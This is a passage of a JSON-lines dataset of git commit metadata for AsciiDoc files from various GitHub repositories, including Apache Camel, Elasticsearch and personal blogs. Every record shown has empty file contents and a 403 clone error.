boukhed\/camel,sirlatrom\/camel,DariusX\/camel,punkhorn\/camel-upstream,gautric\/camel,tadayosi\/camel,dmvolod\/camel,neoramon\/camel,rmarting\/camel,snurmine\/camel,anton-k11\/camel,JYBESSON\/camel,yuruki\/camel,Thopap\/camel,acartapanis\/camel,w4tson\/camel,chirino\/camel,tadayosi\/camel,davidkarlsen\/camel,sverkera\/camel,adessaigne\/camel,allancth\/camel,davidkarlsen\/camel,ssharma\/camel,drsquidop\/camel,isavin\/camel,rmarting\/camel,lburgazzoli\/camel,onders86\/camel,NickCis\/camel,scranton\/camel,gilfernandes\/camel,jkorab\/camel,ullgren\/camel,JYBESSON\/camel,jarst\/camel,scranton\/camel,mgyongyosi\/camel,curso007\/camel,hqstevenson\/camel,jkorab\/camel,lburgazzoli\/apache-camel,pax95\/camel,adessaigne\/camel,anoordover\/camel,veithen\/camel,tkopczynski\/camel,isavin\/camel,allancth\/camel,isavin\/camel,tadayosi\/camel,anoordover\/camel,dmvolod\/camel,isavin\/camel,tdiesler\/camel,veithen\/camel,prashant2402\/camel,adessaigne\/camel,pkletsko\/camel,curso007\/camel,dmvolod\/camel,tlehoux\/camel,jamesnetherton\/camel,tadayosi\/camel,sirlatrom\/camel,tkopczynski\/camel,salikjan\/camel,jarst\/camel,chirino\/camel,acartapanis\/camel,snurmine\/camel,sabre1041\/camel,jarst\/camel,chirino\/camel,kevinearls\/camel,CodeSmell\/camel,gilfernandes\/camel,Thopap\/camel,apache\/camel,pmoerenhout\/camel,rmarting\/camel,cunningt\/camel,anoordover\/camel,bgaudaen\/camel,tdiesler\/camel,sirlatrom\/camel,tdiesler\/camel,jamesnetherton\/camel,pkletsko\/camel,mcollovati\/camel,nicolaferraro\/camel,anoordover\/camel,bhaveshdt\/camel,CodeSmell\/camel,ssharma\/camel,gilfernandes\/camel,neoramon\/camel,tdiesler\/camel,snurmine\/camel,scranton\/camel,prashant2402\/camel,jamesnetherton\/camel,lburgazzoli\/apache-camel,allancth\/camel,cunningt\/camel,JYBESSON\/camel,tlehoux\/camel,lburgazzoli\/apache-camel,bhaveshdt\/camel,snurmine\/camel,tkopczynski\/camel,pax95\/camel,akhettar\/camel,jkorab\/camel,neoramon\/camel,acartapanis\/camel,bhaveshdt\/camel,ullgren\/camel,zregvart\/camel,alvinkwekel\/camel,drsquidop\/camel,gautric\/camel,anton-k11\/camel,dmvolod\/camel,pkletsko
\/camel,christophd\/camel,pmoerenhout\/camel,drsquidop\/camel,scranton\/camel,yuruki\/camel,tkopczynski\/camel,gnodet\/camel,pmoerenhout\/camel,pkletsko\/camel,sirlatrom\/camel,gautric\/camel,rmarting\/camel,sverkera\/camel,apache\/camel,mgyongyosi\/camel,pax95\/camel,jonmcewen\/camel,gautric\/camel,anoordover\/camel,nboukhed\/camel,nboukhed\/camel,anton-k11\/camel,lburgazzoli\/camel,anton-k11\/camel,sverkera\/camel,w4tson\/camel,gnodet\/camel,punkhorn\/camel-upstream,RohanHart\/camel,gautric\/camel,allancth\/camel,jarst\/camel,onders86\/camel,zregvart\/camel,lburgazzoli\/camel,driseley\/camel,hqstevenson\/camel,nikhilvibhav\/camel,curso007\/camel,bgaudaen\/camel,christophd\/camel,alvinkwekel\/camel,cunningt\/camel,apache\/camel,driseley\/camel,objectiser\/camel,nikhilvibhav\/camel,bhaveshdt\/camel,jonmcewen\/camel,neoramon\/camel,nboukhed\/camel,isavin\/camel,kevinearls\/camel,acartapanis\/camel,ullgren\/camel,onders86\/camel,adessaigne\/camel,curso007\/camel,lburgazzoli\/camel,gnodet\/camel,gilfernandes\/camel,lburgazzoli\/camel,w4tson\/camel,sabre1041\/camel,jonmcewen\/camel,RohanHart\/camel,jkorab\/camel,objectiser\/camel,alvinkwekel\/camel,alvinkwekel\/camel,ssharma\/camel,mgyongyosi\/camel,pkletsko\/camel,tkopczynski\/camel,tlehoux\/camel,anoordover\/camel,w4tson\/camel,Fabryprog\/camel,davidkarlsen\/camel,cunningt\/camel,Fabryprog\/camel,acartapanis\/camel,DariusX\/camel,akhettar\/camel,sabre1041\/camel,hqstevenson\/camel,ssharma\/camel,nicolaferraro\/camel,punkhorn\/camel-upstream,veithen\/camel,bgaudaen\/camel,w4tson\/camel,nicolaferraro\/camel,jamesnetherton\/camel,Fabryprog\/camel,NickCis\/camel,snurmine\/camel,akhettar\/camel,sirlatrom\/camel,neoramon\/camel,jarst\/camel,NickCis\/camel,scranton\/camel,mgyongyosi\/camel,lburgazzoli\/apache-camel,Thopap\/camel,prashant2402\/camel,Thopap\/camel,davidkarlsen\/camel,kevinearls\/camel,tadayosi\/camel,cunningt\/camel,NickCis\/camel,cunningt\/camel,yuruki\/camel,RohanHart\/camel,adessaigne\/camel,mcollovati\/camel,objectiser\/camel,neoramon\/camel,ssharma\/camel,yuruki\/camel,bgaudaen\/camel,gautric\/camel,jarst\/camel,yuruki\/camel,chirino\/camel,chirino\/camel,drsquidop\/camel,onders86\/camel,yuruki\/camel,nikhilvibhav\/camel,scranton\/camel,tlehoux\/camel,hqstevenson\/camel,anton-k11\/camel,Thopap\/camel,ssharma\/camel,tdiesler\/camel,Fabryprog\/camel,jkorab\/camel,gnodet\/camel,rmarting\/camel,ullgren\/camel,jonmcewen\/camel,curso007\/camel,mcollovati\/camel,jonmcewen\/camel,akhettar\/camel,anton-k11\/camel,chirino\/camel,sirlatrom\/camel,tdiesler\/camel,zregvart\/camel,jonmcewen\/camel,DariusX\/camel,driseley\/camel,hqstevenson\/camel,kevinearls\/camel,sabre1041\/camel,nicolaferraro\/camel,JYBESSON\/camel,sverkera\/camel,RohanHart\/camel,akhettar\/camel,lburgazzoli\/apache-camel,drsquidop\/camel,allancth\/camel,lburgazzoli\/apache-camel,jamesnetherton\/camel,bgaudaen\/camel,Thopap\/camel,jamesnetherton\/camel,apache\/camel","old_file":"components\/camel-hl7\/src\/main\/docs\/terser-language.adoc","new_file":"components\/camel-hl7\/src\/main\/docs\/terser-language.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d8070f92ef9f99de9f2c5bf0d44041b23fa5b038","subject":"y2b create post Personal TECH TOUR + Meet AJ the new guy!","message":"y2b create post Personal TECH TOUR + Meet AJ the new 
guy!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-01-21-Personal-TECH-TOUR--Meet-AJ-the-new-guy.adoc","new_file":"_posts\/2013-01-21-Personal-TECH-TOUR--Meet-AJ-the-new-guy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6d4add5131d8d1bd62cb243ef8dd1ed761904549","subject":"Update 2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","message":"Update 2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","new_file":"_posts\/2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e50b9df9f86f8aee3cc27f3c2229a1e2a879839","subject":"y2b create post The Black Friday Deals They Won't Show You...","message":"y2b create post The Black Friday Deals They Won't Show You...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-11-23-The%20Black%20Friday%20Deals%20They%20Won't%20Show%20You....adoc","new_file":"_posts\/2017-11-23-The%20Black%20Friday%20Deals%20They%20Won't%20Show%20You....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6dbc5882dbbff571bffeddaf55668da6caa0d001","subject":"Publish 2010-12-7-Recenberg-15th-success-rule-applied-to-life.adoc","message":"Publish 2010-12-7-Recenberg-15th-success-rule-applied-to-life.adoc","repos":"raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io","old_file":"2010-12-7-Recenberg-15th-success-rule-applied-to-life.adoc","new_file":"2010-12-7-Recenberg-15th-success-rule-applied-to-life.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raghakot\/raghakot.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f992d7a1991b5fadee218c19bdd1f6a1fba87b51","subject":"Added Tutorial on how to run Furnace in a standalone app","message":"Added Tutorial on how to run Furnace in a standalone app\n","repos":"forge\/docs,addonis1990\/docs,agoncal\/docs,forge\/docs,agoncal\/docs,addonis1990\/docs,luiz158\/docs,luiz158\/docs","old_file":"tutorials\/Running-Standalone-Furnace.asciidoc","new_file":"tutorials\/Running-Standalone-Furnace.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/addonis1990\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"fc8a94c1f1fc1929de0a7f5336f731a5444da584","subject":"y2b create post Does It Suck? 
- $15 Smart Watch","message":"y2b create post Does It Suck? - $15 Smart Watch","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-12-18-Does-It-Suck--15-Smart-Watch.adoc","new_file":"_posts\/2015-12-18-Does-It-Suck--15-Smart-Watch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8858d70775449377fb9877ec855c1c7abeaac3f9","subject":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","message":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34e0e2bc0962072bfee1e7077ef765706a64cd5b","subject":"y2b create post Unboxing The iPhone X Clone Edition","message":"y2b create post Unboxing The iPhone X Clone Edition","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-10-24-Unboxing-The-iPhone-X-Clone-Edition.adoc","new_file":"_posts\/2017-10-24-Unboxing-The-iPhone-X-Clone-Edition.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"47aac923485d95b574024b5af59889f8906ba60a","subject":"Update 2017-05-06-Migrate-Images-to-Sonata-Media.adoc","message":"Update 2017-05-06-Migrate-Images-to-Sonata-Media.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-06-Migrate-Images-to-Sonata-Media.adoc","new_file":"_posts\/2017-05-06-Migrate-Images-to-Sonata-Media.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2458334e012357c14072d58cbb3da1cd03bb4d80","subject":"Update 2017-02-14-Episode-88-Arcooda-Been-a-Pinball-Wizard.adoc","message":"Update 2017-02-14-Episode-88-Arcooda-Been-a-Pinball-Wizard.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-02-14-Episode-88-Arcooda-Been-a-Pinball-Wizard.adoc","new_file":"_posts\/2017-02-14-Episode-88-Arcooda-Been-a-Pinball-Wizard.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b28f1aa781ec5b1057b7139379d8a400f8b7b6b0","subject":"update libraries in doc.","message":"update libraries in 
doc.\n","repos":"nobusugi246\/building-msa-in-30-minutes,nobusugi246\/building-msa-in-30-minutes","old_file":"src\/docs\/asciidoc\/MSAin30min_ja.adoc","new_file":"src\/docs\/asciidoc\/MSAin30min_ja.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nobusugi246\/building-msa-in-30-minutes.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c378777abbd557aa7b3c28645f58628d24e105b1","subject":"Update 2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","message":"Update 2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","repos":"darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io","old_file":"_posts\/2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","new_file":"_posts\/2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/darsto\/darsto.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"261791800efdeec2e7719f682dd06ea1f4fa6711","subject":"add a readme","message":"add a readme\n","repos":"devnull-tools\/boteco,devnull-tools\/boteco","old_file":"plugins\/boteco-plugin-mongodb\/README.adoc","new_file":"plugins\/boteco-plugin-mongodb\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devnull-tools\/boteco.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"82132343b038a7923c2dda31a5823bb697d643cc","subject":"y2b create post Boxing Week Deals \\\/ New Products","message":"y2b create post Boxing Week Deals \\\/ New Products","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-29-Boxing-Week-Deals--New-Products.adoc","new_file":"_posts\/2011-12-29-Boxing-Week-Deals--New-Products.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"73a1c72beb6b11bef23806d49d553240fc4aaf28","subject":"Update 2016-08-14-Kesan-lopettajais-skumpatjallut.adoc","message":"Update 2016-08-14-Kesan-lopettajais-skumpatjallut.adoc","repos":"sakkemo\/blog,sakkemo\/blog,sakkemo\/blog,sakkemo\/blog","old_file":"_posts\/2016-08-14-Kesan-lopettajais-skumpatjallut.adoc","new_file":"_posts\/2016-08-14-Kesan-lopettajais-skumpatjallut.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sakkemo\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1369814bd51099fbd18de291243f18c8503a051a","subject":"Update 2018-12-14-Learn-Programming-the-Right-Way.adoc","message":"Update 2018-12-14-Learn-Programming-the-Right-Way.adoc","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-12-14-Learn-Programming-the-Right-Way.adoc","new_file":"_posts\/2018-12-14-Learn-Programming-the-Right-Way.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to 
access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da002c04f9f53184ff074c63410fd218c4dbab64","subject":"Renamed '_posts\/2015-01-01-App-help-page.adoc' to '_posts\/2015-01-01-Feature-or-Bug-Report.adoc'","message":"Renamed '_posts\/2015-01-01-App-help-page.adoc' to '_posts\/2015-01-01-Feature-or-Bug-Report.adoc'","repos":"brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io","old_file":"_posts\/2015-01-01-Feature-or-Bug-Report.adoc","new_file":"_posts\/2015-01-01-Feature-or-Bug-Report.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/brendena\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a87fac4bcfb3480c634811730756c980d7230d4c","subject":"Update 2017-04-10-3-D-printer-is-coming.adoc","message":"Update 2017-04-10-3-D-printer-is-coming.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-10-3-D-printer-is-coming.adoc","new_file":"_posts\/2017-04-10-3-D-printer-is-coming.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"45bcd9a81113d842533cc0013728fccaefcca478","subject":"Update 2018-02-05-Think-About-Documents.adoc","message":"Update 2018-02-05-Think-About-Documents.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-05-Think-About-Documents.adoc","new_file":"_posts\/2018-02-05-Think-About-Documents.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e95fe39ab8573f0bfc613c6b865dbe6ea3b8ea4a","subject":"Ref Guide: Add master-only page for upgrading to Solr 8 - place for notes for now","message":"Ref Guide: Add master-only page for upgrading to Solr 8 - place for notes for now\n","repos":"apache\/solr,apache\/solr,apache\/solr,apache\/solr,apache\/solr","old_file":"solr\/solr-ref-guide\/src\/major-changes-in-solr-8.adoc","new_file":"solr\/solr-ref-guide\/src\/major-changes-in-solr-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apache\/solr.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8601d3868fff14b8fa72227b0e28b0df76356520","subject":"Update 2015-12-17-Stop-use-jQuery-you-can-do-better-without.adoc","message":"Update 2015-12-17-Stop-use-jQuery-you-can-do-better-without.adoc","repos":"vba\/vba.github.io,vba\/vba.github.io,vba\/vba.github.io","old_file":"_posts\/2015-12-17-Stop-use-jQuery-you-can-do-better-without.adoc","new_file":"_posts\/2015-12-17-Stop-use-jQuery-you-can-do-better-without.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vba\/vba.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"8033982f402283957b9690b37a3bd325900ac853","subject":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","message":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"79199517794ac2400b16e8f534e05f47d5fe7f44","subject":"Update 2018-03-01-Universal-Site-is-the-new-Accessible-Site.adoc","message":"Update 2018-03-01-Universal-Site-is-the-new-Accessible-Site.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2018-03-01-Universal-Site-is-the-new-Accessible-Site.adoc","new_file":"_posts\/2018-03-01-Universal-Site-is-the-new-Accessible-Site.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8e63ce00f0f1f64d835b1d1ea52f15184bbda6e4","subject":"docs: removed confusing statement.","message":"docs: removed confusing statement.\n","repos":"nazarewk\/elasticsearch,gingerwizard\/elasticsearch,glefloch\/elasticsearch,JSCooke\/elasticsearch,umeshdangat\/elasticsearch,brandonkearby\/elasticsearch,nomoa\/elasticsearch,i-am-Nathan\/elasticsearch,IanvsPoplicola\/elasticsearch,girirajsharma\/elasticsearch,uschindler\/elasticsearch,StefanGor\/elasticsearch,mikemccand\/elasticsearch,robin13\/elasticsearch,markwalkom\/elasticsearch,rlugojr\/elasticsearch,robin13\/elasticsearch,geidies\/elasticsearch,JackyMai\/elasticsearch,a2lin\/elasticsearch,njlawton\/elasticsearch,LeoYao\/elasticsearch,elasticdog\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,wangtuo\/elasticsearch,henakamaMSFT\/elasticsearch,mohit\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,scottsom\/elasticsearch,strapdata\/elassandra5-rc,sreeramjayan\/elasticsearch,naveenhooda2000\/elasticsearch,shreejay\/elasticsearch,maddin2016\/elasticsearch,obourgain\/elasticsearch,LeoYao\/elasticsearch,strapdata\/elassandra5-rc,rajanm\/elasticsearch,mikemccand\/elasticsearch,nilabhsagar\/elasticsearch,jprante\/elasticsearch,StefanGor\/elasticsearch,mortonsykes\/elasticsearch,artnowo\/elasticsearch,rlugojr\/elasticsearch,bawse\/elasticsearch,girirajsharma\/elasticsearch,liweinan0423\/elasticsearch,myelin\/elasticsearch,coding0011\/elasticsearch,awislowski\/elasticsearch,nezirus\/elasticsearch,mortonsykes\/elasticsearch,wenpos\/elasticsearch,pozhidaevak\/elasticsearch,MaineC\/elasticsearch,maddin2016\/elasticsearch,liweinan0423\/elasticsearch,nomoa\/elasticsearch,LeoYao\/elasticsearch,Stacey-Gammon\/elasticsearch,masaruh\/elasticsearch,girirajsharma\/elasticsearch,uschindler\/elasticsearch,mjason3\/elasticsearch,jprante\/elasticsearch,fforbeck\/elasticsearch,strapdata\/elassandra,gingerwizard\/elasticsearch,nomoa\/elasticsearch,fred84\/elasticsearch,liweinan0423\/elasticsearch,markwalkom\/elastics
earch,jprante\/elasticsearch,myelin\/elasticsearch,vroyer\/elassandra,obourgain\/elasticsearch,JervyShi\/elasticsearch,markwalkom\/elasticsearch,fforbeck\/elasticsearch,glefloch\/elasticsearch,wangtuo\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,sreeramjayan\/elasticsearch,cwurm\/elasticsearch,sreeramjayan\/elasticsearch,jimczi\/elasticsearch,geidies\/elasticsearch,nezirus\/elasticsearch,yanjunh\/elasticsearch,StefanGor\/elasticsearch,vroyer\/elasticassandra,dongjoon-hyun\/elasticsearch,i-am-Nathan\/elasticsearch,spiegela\/elasticsearch,artnowo\/elasticsearch,winstonewert\/elasticsearch,MaineC\/elasticsearch,fernandozhu\/elasticsearch,nezirus\/elasticsearch,strapdata\/elassandra,rajanm\/elasticsearch,shreejay\/elasticsearch,strapdata\/elassandra5-rc,C-Bish\/elasticsearch,coding0011\/elasticsearch,s1monw\/elasticsearch,MisterAndersen\/elasticsearch,trangvh\/elasticsearch,glefloch\/elasticsearch,artnowo\/elasticsearch,liweinan0423\/elasticsearch,LewayneNaidoo\/elasticsearch,HonzaKral\/elasticsearch,JervyShi\/elasticsearch,qwerty4030\/elasticsearch,elasticdog\/elasticsearch,dpursehouse\/elasticsearch,GlenRSmith\/elasticsearch,masaruh\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,obourgain\/elasticsearch,scottsom\/elasticsearch,s1monw\/elasticsearch,wenpos\/elasticsearch,qwerty4030\/elasticsearch,scottsom\/elasticsearch,Helen-Zhao\/elasticsearch,fred84\/elasticsearch,i-am-Nathan\/elasticsearch,ricardocerq\/elasticsearch,fernandozhu\/elasticsearch,s1monw\/elasticsearch,fred84\/elasticsearch,jprante\/elasticsearch,nezirus\/elasticsearch,uschindler\/elasticsearch,bawse\/elasticsearch,mjason3\/elasticsearch,strapdata\/elassandra,pozhidaevak\/elasticsearch,MaineC\/elasticsearch,shreejay\/elasticsearch,sneivandt\/elasticsearch,alexshadow007\/elasticsearch,a2lin\/elasticsearch,mohit\/elasticsearch,brandonkearby\/elasticsearch,yanjunh\/elasticsearch,strapdata\/elassandra,brandonkearby\/elasticsearch,Shepard1212\/elasticsearch,lks21c\/elasticsearch,ZTE-PaaS\/elasticsearch,StefanGor\/elasticsearch,njlawton\/elasticsearch,avikurapati\/elasticsearch,nezirus\/elasticsearch,JervyShi\/elasticsearch,camilojd\/elasticsearch,i-am-Nathan\/elasticsearch,glefloch\/elasticsearch,geidies\/elasticsearch,sreeramjayan\/elasticsearch,umeshdangat\/elasticsearch,JackyMai\/elasticsearch,LeoYao\/elasticsearch,StefanGor\/elasticsearch,wuranbo\/elasticsearch,shreejay\/elasticsearch,nknize\/elasticsearch,LeoYao\/elasticsearch,camilojd\/elasticsearch,geidies\/elasticsearch,pozhidaevak\/elasticsearch,qwerty4030\/elasticsearch,mohit\/elasticsearch,kalimatas\/elasticsearch,uschindler\/elasticsearch,MisterAndersen\/elasticsearch,IanvsPoplicola\/elasticsearch,MaineC\/elasticsearch,wuranbo\/elasticsearch,bawse\/elasticsearch,HonzaKral\/elasticsearch,avikurapati\/elasticsearch,IanvsPoplicola\/elasticsearch,kalimatas\/elasticsearch,JervyShi\/elasticsearch,dongjoon-hyun\/elasticsearch,naveenhooda2000\/elasticsearch,zkidkid\/elasticsearch,gfyoung\/elasticsearch,Stacey-Gammon\/elasticsearch,ZTE-PaaS\/elasticsearch,henakamaMSFT\/elasticsearch,gmarz\/elasticsearch,yanjunh\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nazarewk\/elasticsearch,s1monw\/elasticsearch,spiegela\/elasticsearch,dongjoon-hyun\/elasticsearch,zkidkid\/elasticsearch,Shepard1212\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,LeoYao\/elasticsearch,Helen-Zhao\/elasticsearch,fernandozhu\/elasticsearch,sneivandt\/elasticsearch,qwerty4030\/elasticsearch,trangvh\/elasticsearch,fernandozhu\/elasticsearch,myelin\/elasticsearch,mikemcc
and\/elasticsearch,LewayneNaidoo\/elasticsearch,myelin\/elasticsearch,trangvh\/elasticsearch,LewayneNaidoo\/elasticsearch,MisterAndersen\/elasticsearch,palecur\/elasticsearch,dpursehouse\/elasticsearch,nknize\/elasticsearch,girirajsharma\/elasticsearch,s1monw\/elasticsearch,liweinan0423\/elasticsearch,awislowski\/elasticsearch,zkidkid\/elasticsearch,vroyer\/elassandra,gmarz\/elasticsearch,cwurm\/elasticsearch,glefloch\/elasticsearch,vroyer\/elasticassandra,IanvsPoplicola\/elasticsearch,nomoa\/elasticsearch,wuranbo\/elasticsearch,njlawton\/elasticsearch,shreejay\/elasticsearch,gmarz\/elasticsearch,LeoYao\/elasticsearch,Helen-Zhao\/elasticsearch,cwurm\/elasticsearch,awislowski\/elasticsearch,masaruh\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,scottsom\/elasticsearch,jimczi\/elasticsearch,C-Bish\/elasticsearch,JervyShi\/elasticsearch,trangvh\/elasticsearch,rajanm\/elasticsearch,camilojd\/elasticsearch,mortonsykes\/elasticsearch,sreeramjayan\/elasticsearch,JSCooke\/elasticsearch,rlugojr\/elasticsearch,ricardocerq\/elasticsearch,kalimatas\/elasticsearch,ZTE-PaaS\/elasticsearch,JSCooke\/elasticsearch,fforbeck\/elasticsearch,elasticdog\/elasticsearch,bawse\/elasticsearch,rajanm\/elasticsearch,JSCooke\/elasticsearch,elasticdog\/elasticsearch,fred84\/elasticsearch,nazarewk\/elasticsearch,gfyoung\/elasticsearch,vroyer\/elassandra,jimczi\/elasti